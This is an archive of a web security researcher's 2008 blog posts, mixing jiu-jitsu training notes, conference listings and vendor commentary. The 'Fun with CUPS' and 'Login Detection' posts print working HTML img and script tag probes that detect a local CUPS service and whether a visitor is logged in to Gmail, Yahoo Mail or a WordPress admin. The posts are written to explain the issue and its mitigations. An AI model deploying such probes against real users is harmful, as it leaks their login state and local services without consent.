Sunday, March 30, 2008

Brazilian Jiu-Jitsu Rulez!

Still loving Brazilian Jiu-Jitsu training and I mixed in some standup to build MMA experience. I’d strike more often, but considering all the public speaking it probably wouldn’t be a good idea to show up on stage with a black eye or worse. *Amazing that hasn't happened already.* Still pure BJJ is extremely physically demanding and at the same time incredibly cerebral. Skill and by extension belt levels take forever to increase. For example 3 years in I’m still only a blue belt, one up from white, but I have high hopes of earning purple this summer. My 5 year old girl also comes with me all the time so she can learn the moves. Let me tell you, if you let her take your back, she WILL tap you with a rear choke and don’t even mess with the arm bars from the mount. Makes a father proud. :)

As most reading here know I travel quite extensively which makes keeping a weekly BJJ schedule difficult to maintain. So instead of stopping periodically I decided to travel with my Gi everywhere I go. Over the last few months I’ve trained in about two dozen academies across California, Hawaii, Florida, Texas, New York, Winsconsin, and probably some others I’m forgetting. Every academy I’ve been to the instructors are really cool and experienced , having different strengths and weaknesses, but most importantly have chill students where big egos are rare. What surprised me the most is the varying styles. When I first started grappling I simply didn’t appreciate or even notice the subtle differences that I do now.

When I train in other schools I do my best to refrain from tapping people with higher belts than me because of, well, lets just say I had a bad incident. However under no circumstances am I to get tapped by anyone, let alone someone of the same belt level or lower. My instructor gets really emotional about that sort of thing. :) I'm proud to say that I hold my own with any blue belt or even purple for that matter and hope to prove it in competition soon. The few times I’ve had the opportunity to train with a brown I get my ass kicked bad, embarrassing like. While I enjoy developing my skill, my weight is always on my mind cause I want to enter a tournament. I started off BJJ at 300lbs (136kg) and needed get down to 221lbs (100kg) to enter the super heavyweight class.

Currently hovering at about 240lbs, the last couple of months of weight loss has been painfully slow, even though I'm noticeably thinner. That’s probably because I’ve focused more on fat loss and muscle gain to be stronger, faster, with more stamina. One thing I’ve learned is that most people can only physically train 2-3 BJJ hours a day at the most because after that the body just can’t take any more. This is quite different that what I’m used to in technology where I can burn 12-14 hours a day, week in and week out, until I master a given subject. In BJJ this is simply not the case, so when you are in the gym you better make the most of it. I did find that cross-training helps tremendously for fitness on the mat. While my BJJ muscle scream in pain, I can usually still weight lift, run, stretch, swim, or do something else with only moderate discomfort.

Aussie Rules Football is right around the corner so I have to make sure I running stamina is ready to go.

InfoSec Conferences Abound

Every infosec conference has something different to offer and is of value depending on what you are into. Some people enjoy the talks and the expert speakers, others like learning about the vendors latest warez, while more still take advantage of events taking place close to home if travel isn’t an option. So while many of us are gearing up for during the final week before RSA, here are some other conferences definitely worth a look.

TRISC
The Texas Regional Infrastructure Security Conference taking place in San Antonio. I went last year and had a really good time, but couldn’t attend this time around since I’m scheduled to be present for InfoSec World 2008 in London. TRISC's talks favored more of the business side as opposed to super deep tech which makes it ideal for IT professionals with a casual security background. The agenda has some top webappsec talent lined up and I’ve personally seem them all present. Good guys with engaging material. Texas local RSnake is making the drive from Austin and WhiteHat’s own Trey Ford will carrying our flag.
  • Why I don’t use web-app scanners ... all the time. - Robert Hansen
  • Top Website Vulnerabilities: Trends, Business Effects, How to Fight Them - Trey Ford
  • Black Box Vs. White Box: App Testing Strategies - John Dickson
  • Securing the SDLC: A Case Study - Dan Cornell

ToorCon Seattle
Man, I haven’t had the chance to get back to ToorCon in years and I really miss it. Its deep technically, has the latest content, solid speakers, cool events, and laid back fun style. ToorCon is a lot like Defcon was years back before it got HUGE. Of course my schedule is too crazy as usual, I’ll be in Dubai at HiTB during the conference so won’t be able to make it. Though I do see a lot of excellent speakers listed on the agenda, which is essential for any good show. If you are in the area or have the means to travel, you’ll definitely have a good time.


InfoSec World 2008 (London)
I’ve only just started really experiencing MISTI’s InfoSec World’s shows. The first being the 2008 one in Orlando just a little while ago, where I had a great time mixing with the attendees and hanging out with several familiar faces. InfoSec World had plenty of sponsors so the venue and the amenities were stellar all around. Catered parties, free booze and snacks, yum. ;) The hotel itself was crazy nice, even the taxis were black SUVs. How similar this is to Europe I have no idea, but I’m looking forward to the trip and finding out. If anyone reading is going to be around for the show, please let me know.

Friday, March 21, 2008

SANS - WhatWorks in Web Application Security Summit 2008 (Las Vegas)

I’ve probably been to over 50 IT Security events/conferences in the last 18 months, precious few being completely dedicated to web application security -- the last being AppSec 2007. While AppSec was awesome, what many asked for next was an environment set-up to discuss battlefield tested strategies and tactics that REALLY work. For example, “what are the best ways to identify vulnerabilities, remediate them, and prevent them from occurring (SDL)”? “What about PCI compliance”? “Products vs. Services”? That’s where SANS "WhatWorks in Web Application Security Summit 2008" (June 1-2, 2008 - Las Vegas, NV) comes in and why WASC has been helping organize the event. I went to the first in Washington D.C. and really enjoyed myself.

The event will NOT be dominated by vendor speakers subtly driving people towards self-serving solutions. In fact, there are only four "expert briefings" and two "vendor panels" during the entire two-day single track session. The bulk of the agenda is "user panels" involving real people sharing their experiences on how they defend their websites and ensure secure code. These are people who've been there and done it, who've looked at and tried everything and have experience to know what works and what doesn't. Attendees are from financial services, retail, healthcare, insurance and other industries filling a broad range IT Security roles. People are encouraged, if not expected, to ask questions and get the information they need.

Of course no conference would be complete without including some top names in the industry. So we have Robert “RSnake” Hansen (SecTheory), Caleb Sima (Chief Technologist - Security at HP Software), Gary McGraw (CTO of Cigital), and yours truly will on docket. After all the vendor stuff is cleared post RSA, I’ll be looking forward to this event. Plus, I’ve never stayed at the Paris hotel so that should be cool. Viva Las Vegas!

Thursday, March 20, 2008

Unsolved Problems

Many people probably do something similar, but for years I’ve kept a running list of unsolved technology problems that I’ve come across. Typically specific things I’d like to build, design, or break. As it applies to Web security some are potential hacks, defense measures, or conceptual designs mostly regarding Web browsers and Websites. This serves as a nice in-flight activity as opposed to crossword puzzles, some being more compelling to work on than others. When I post some little trick here it usually comes off this list, still the list always seems to grow instead of shorten. ;)

Anyway, I thought it might be interesting for others too see several of the things currently on my list. See below.

What unsolved Web security problems are you working on?

Unsolved Problems:
- Create a better CAPTCHA that scores a better on the Effectiveness Test than the current image version everyone hates
- Develop a CSRF defensive measure that’s effective in the presence of an XSS vulnerability on the same target domain
- Obtain a users NAT'ed IP address using ONLY HTML/JavaScript
- Send a valid XML web services request cross0domain in a browser using only HTML/JavaScript. Do not use any of the new FF cross-domain features as the target server should not need to opt-in.
- Design a conceptual replacement for the Web browser same-origin policy that addresses its deficiencies
- Find a way to SCRIPT SRC or included within the DOM a JSON feed wrapped using curly braces

Wednesday, March 19, 2008

Fun with CUPS

This week Apple released a large set of patches, one that caught my eye was for CUPS. For those unfamiliar, the Common UNIX Printing System provides a portable printing layer for UNIX®-based operating systems AND listens on localhost port 631 (http). Check if you have it running (http://localhost:631/) HAH! No Firefox port blocking. :) According to the several advisory links there was some kind of heap overflow through a CGI.

I thought that was really interesting since CUPS is currently running on my MacBook Pro, I believe ever since I set up a printer. I’m fairly certain this is standard OS X behavior. Kurt Grutzmacher shared this info with me a long while back (after the intranet hacking talks) and we tried to locate a single XSS issue on the Web-interface. If we had been successful (we weren't) it would have made for a really nasty way to pull a list of someone completed print jobs (and maybe a little more). Maybe DNS Rebinding would do the trick?

Anyway, while I don’t know or have the exact HTTP request that would cause the overflow, it sounds technically possible that this could be exploited basically by visiting any random malicious web page. And there seems to be a lot of that sort of thing going on these days. To borrow the login detection trick from earlier, here's a quick way to tell if a user is running CUPS.
<* img src="http://localhost:631/images/navbar.gif" onload="alert('CUPS is listening')" onerror="alert('No CUPS')">

Tuesday, March 18, 2008

Attacks, Attacks, and More Attacks

So many I’m unable to follow them all let alone post a story on each. There are a few I wanted to draw attention to though.

McAfee reported that an estimated 10K – 20K web pages (most running ASP) were laced with a malicious JavaScript iframe that infects visitors with a password-stealing Trojan targeting popular online games. The event was very similar to the Dophin Stadium hack from way back during the Super Bowl. From the reports I couldn’t immediately discern how the compromise originally took place.

Now there seems to be another mass attack, this time affecting 200K pages, most running phpBB. Wow.

Next we got reports of a “Major Flaw In Pennsylvania Online Voter Registration”. Careful pressing the digg link, it’ll download someone’s voter registration card. Check out the comments below and you’ll get the idea. Basically it’s a simple URL number rotation hack. Score for insufficient authorization and a whole bunch of other oversights.

Lastly check this out, “Close to 70 Massachusetts banks have been contacted by Visa and MasterCard”, having potentially “exposed hundreds of thousands of consumers in the northeastern U.S.” The smart money says an ASV might have gotten 0wN3ed.

Monday, March 17, 2008

WASC RSA Meet-Up 2008!

For those attending the RSA Conference (San Francisco / April 7 – 11) and want to eat, drink, and be merry with the everyone in the webappsec community, the WASC meet-up is the place to be. Last years event rocked, 60 - 70 people showed, so we figured this time we better get a sponsor to pay for all the food & drinks. :) WASC meet-ups are a great opportunity to see people that we only otherwise communicate with virtually. Of course there will be a lot of familiar faces in the crowd. Everyone is welcome, but space is extremely limited, so RSVP is you plan to attend email: michael.edwards -AT - whitehatsec.com

Place:
Jillian's @ Metreon
(Walking distance from the conference)

101 4th Street, Suite 170
San Francisco, CA 94103
Phone: 415.369.6100

Time: Wed, April. 9 @ 12:00pm - 2:00pm

VA + WAF, yes it really works!

Over the last week I’ve been inundated with people interested in WhiteHat Security’s new partnership with F5, specially the integration between Sentinel and their web application firewall (ASM). This is where we identify vulnerabilities, send custom rules to their WAF, and customers mitigate issues with the push of a button. It was actually Arian Evans (Director of Operations) who reminded me what this means for WhiteHat as a company when he recalled a conversation he had with Bill Pennington (VP of Services) and myself upon first joining the team. The question on the table was, “What is the most compelling story WhiteHat could ever tell?”

After a long conversation loaded with acronyms and buzzwords the consensus was simple, “find and fix.” That is, finding vulnerabilities on websites and fixing them on an INTERNET-WIDE scale. Only a year and a half ago few outside company walls believed we could pull off the first part, let alone second. Today we’re well on our way to accomplishing exactly that and even our staunchest critics have come around. Now partnered with F5, whose #1 is performance and load balancers, we’re ambitiously taking the next step. Imagine having the time to take care of vulnerabilities in the source code when and how you choose. Imagine being a security guy with control over the security of your website(s).

Many are curious as to how we plan to succeed with the VA+WAF concept where others in the past failed. The answer is two fold. Today’s WAF products are way more technologically mature than in years past, but the most important part is we’re able to fill the biggest missing piece -- accurate vulnerability data. Commercial scanning vendors proved time and time again dumping hundreds or even thousands of unvalidated results loaded with false positives and duplicate vulnerabilities into a WAF just doesn’t work. By contrast, with people, process, and a lot of technology we’ve overcome that hurdle. WAFs can now become easy to set-up, manage, and best of all block attacks attempting to exploit vulnerabilities (a rarity).

Bill had the same impression as I did when first seeing the technology work, in a word, “amazing”. The VA+WAF combination resonates with everyone we share it with -- media, analysts, experts, IT professionals, you name it. Can you tell I’m excited? ;) The integration will also mean volumes for PCI 6.6 as a way for organizations to meet their obligations quickly and effectively. In a few short weeks the RSA Conference will be the first place we’ll have a demo on public display. Everyone is welcome to stop by the booth and see it for themselves. I can’t wait!

Tuesday, March 11, 2008

Login Detection, whose problem is it?

There are several different ways that JavaScript malware can tell if a user is logged-in to a particular website. I’d like demonstrate a couple of them, RSnake and I talked about variances of these before. We’ll be using GMail, Yahoo Mail, and ha.ckers.org as guinea pigs. The tricks leverage CSRF and authenticated content (well-formed HTML or images) with predictable URLs. I spent a few minutes on each WebMail system locating URLs that respond differently depending on if the user is logged-in or not.

1) https://mail.google.com/mail/pimages/2/icons_ns1.png
2) http://us.mg1.mail.yahoo.com/dc/rs?log=SuccessfulLaunch
3) http://ha.ckers.org/blog/wp-admin/images/toggle.gif

I’m sure similar URLs can be found on most any website with user accounts. The GMail URL responds with an image when the user is logged-in and HTML when their not. The YahooMail URL responds with just a simple HTML comment when logged-in or a large HTML error page when their not. The ha.ckers.org URL will only be served if you are logged as an admin on Wordpress, otherwise a forbidden message appears.

The ways the URLs respond are subtly different and require slightly unique approaches when applied to Firefox 3 (b3) as we’ll see next.

For GMail its extremely simple.

<* img src="https://mail.google.com/mail/pimages/2/icons_ns1.png" onload="alert('GMail: Logged-In')" onerror="alert('Gmail: Not Logged-in')">

The IMG tag onload event handler fires if a valid image returns while the onerror event handler fires on invalid images (example: receives HTML). Easy boolean logic. Of course additional code is required to send the results back to the server but that’s beyond our scope here.

The ha.ckers.org is exactly the same as GMail.

<* img src="http://ha.ckers.org/blog/wp-admin/images/toggle.gif" onload="alert('RSnake: Logged-In')" onerror="alert('RSnake: Not Logged-in')">


The YahooMail example is almost as simple, but has to be implemented a little differently since we’re dealing with only HTML responses and no images.

<* script src="http://us.mg1.mail.yahoo.com/dc/rs?log=SuccessfulLaunch" onload="alert('YahooMail: Logged-in')" onerror="alert('YahooMail: Not Logged-in')">


The SCRIPT tag onload event handler fires if the response is the simple HTML comment, which is valid E4X syntax, while the onerror event handler fires when encountering the HTML error page, which obviously causes the JavaScript interpreter to fail.

Websites owners can do one of two things here:

Remove authentication from the resource if the content isn’t particularly sensitive
Add CSRF-like secret tokens so that the URL is not predictable

At the end of the day though its unlikely that any of these websites, or others with similar issues, will take either step. Even if they did there are so many other ways to pull off the same attack (timing attacks, monitoring onload events, probing for named iframes, JS console errors, etc) which makes the value somewhat limited. I had a long discussion with Chris Evans and Rich Cannings from Google about this particular issue to get their insights.

In our collective opinions its probably not the responsibility of the websites owners to change their (arguably secure) application behavior to compensate for the browser leaking cross-domain information. Though they still could if they really wanted to. Also its probably a lot easier for the browser vendors to remedy this issue in some clever way rather than every website owner doing the above. What do you think?

Sunday, March 09, 2008

Website Security Strategies that Work

Inside an enterprise lives an IT security professional responsible for website security. He takes his job seriously because if his employer’s websites get hacked, he gets the late night call from the boss. A big part of the job requires educating developers on the importance of secure coding and informing the business owners of Web security risks. He does this because no amount of patching or firewalling will fend off an attacker with a browser. While doing everything within his power, there’s still a total lack of control in protecting the websites he’s responsible for. He can’t fix the vulnerabilities in website(s) when they’re found without developer involvement.

Does this situation sound familiar? I hear the frustration all the time. The problem is when a vulnerability is identified by either a pen-tester, developer, outsider or whomever, these are the sole and painful options:

1. Take the website down
2. Revert to an older version of the website/code (if it’s secure)
3. Stay up while exposed.

Nothing is better than not having an issue in the first place, but vulnerabilities will crop up despite the best software development lifecycle. Option #1 is typically reserved for occasions where an incident has occurred and option #2 when a product hot-fix is not back-ported to development, which later gets overwritten. So far history shows the vast majority choose option #3 and assume the risk rather than halt business with fixes coming a ways off.

Clearly we need more options - something that allows the mitigation of vulnerabilities without having an impact on business operations.

This is important because 9 out of 10 (or more) websites have vulnerabilities as a result of being built by those who didn’t know or appreciate the severity of today’s attacks. Furthermore I’d say most of the popular ecommerce websites were built either before the discovery of prevalent vulnerabilities such as XSS, SQL Injection, CSRF, etc. or prior to them becoming common knowledge. Consequently we’re burdened by 15 years of insecure website code already in circulation and it’s extremely unlikely code will be rewritten solely for “security reasons.” Over the coming decade their replacement will occur naturally to achieve business goals while taking advantage of emerging technologies and more secure development frameworks.

That means when you take an honest look at website security there must be two different, but equal, website security strategies:

1) Security throughout the SDLC
2) Vulnerability Assessment + Web Application Firewall

Strategy #1 works best for websites soon to be built or undergoing a major rewrite/addition. A Web security program combining executive buy-in, modern development frameworks, awareness training, and security baked into the design and QA simply does wonders. On the other hand, this strategy is often difficult and expensive to implement on an existing website where no such activity took place historically. Even after vulnerabilities are identified it’s time consuming allocating personnel, QA / regression testing the fix, and scheduling production releases. No matter how mature the SDLC, it takes at least days, sometimes weeks, and even months for issues to be resolved. This is where most are today. This will also really challenge true PCI 6.6 compliance when the burden is realized.

That’s why strategy #2 works best for existing websites. The technology integration by which vulnerability assessment results are immediately imported into a WAF creating a “virtual patch.” The integration closes the loop between vulnerability identification and mitigation allowing the opportunity to address the root causes as time and budgets allow. The challenge here is if the vulnerability data source is inaccurate then the virtual patches may cause the WAF to deny valid traffic, allow malicious traffic, or crash entirely. With verified data, the enterprise is able to fully realize its vulnerability assessment investment in real-time, confidently place WAFs in block mode, and provide IT professionals with the control they’ve always lacked. And it would be about time too!

If this solution sounds familiar, that’s because the idea has been used successfully in the past, just never in web application security. Kavado tried in the 2002-2003 era, in 2003-2004 several more vendors attempted using AVDL, and I’m sure there were others, but ultimately all attempts proved unsuccessful for the reasons above. Only recently has the vulnerability scanning and web application firewall technology matured to the point where the combined approach has finally become viable. As the current state of Web security is being realized and business decisions need to be made, having a variety of options available is a great great thing.

Friday, March 07, 2008

100% secure websites

I think we all can agree that 100% security is impossible, even when adding layer upon layer of defenses, systems will fail eventually. Furthermore too much emphasis on obtaining “perfect” security will result in diminishing returns. When you get right down to it though what we’re really trying to do is keep the bad guys from compromising our websites and that doesn’t necessarily require 100% security. The challenge is finding the right balance between resources put in (time / money) and adequately reducing (not eliminating) the likelihood of getting hacked. Still often people mistakenly try to accomplish one by doing the other.

From my experience in website security there are two predominant types of “bad guys,” troublemakers and the financially motivated. Troublemakers I’ve found are the most difficult to defend against. They’ll often spend an extraordinary amount of effort (day, weeks, months, and sometimes years) to pull off a defacement, achieve administrative level access, cheat at a game, alert(‘xss’), disrupt user experience, and so on. To successfully defend against a troublemaker you must have perfect security all the time (impossible) while they just have to exploit one issue. Fortunately the result of their antics are unlikely to result in substantive reputation or financial loss and mostly will just annoy you and waste time.

Interestingly the financially motivated, the ones we really have to worry about, are easier to deal with since they conform to an ROI model. Financially motivated bad guys follow the path of least resistance by targeting the softer and more potentially lucrative websites. They’re after credit card numbers, social security numbers, passwords, and other forms of useful sensitive information. Whatever will help them pull off a fraudulent transaction. They might spend as much as a couple of days in sweeping attacks or a few weeks on targeted attacks if the reward looks promising, but probably no more as other websites would prove easier. So if your website is too hard to hack, the bad guys will move on, probably to your competitors/peers.

There’s a funny joke that lends context:

Two guys are hiking and suddenly a bear starts chasing them...
The first guy says, "Are you crazy!? We can’t outrun a bear!”
The second guy says, "I don't have to outrun the bear... I only have to outrun you!"

(In Hawaii we have a similar variant with surfers and sharks.)

The challenge in website security is knowing exactly how fast the bear and other guy are, plus they tend to get faster over time. WhiteHat Security plans to release some statistics around this area soon. Apart from that a good rule of thumb is if XSS, SQLi and few other attack classes can be found in your website within a few minutes/hours, then its probably one of masses playing Russian Roulette.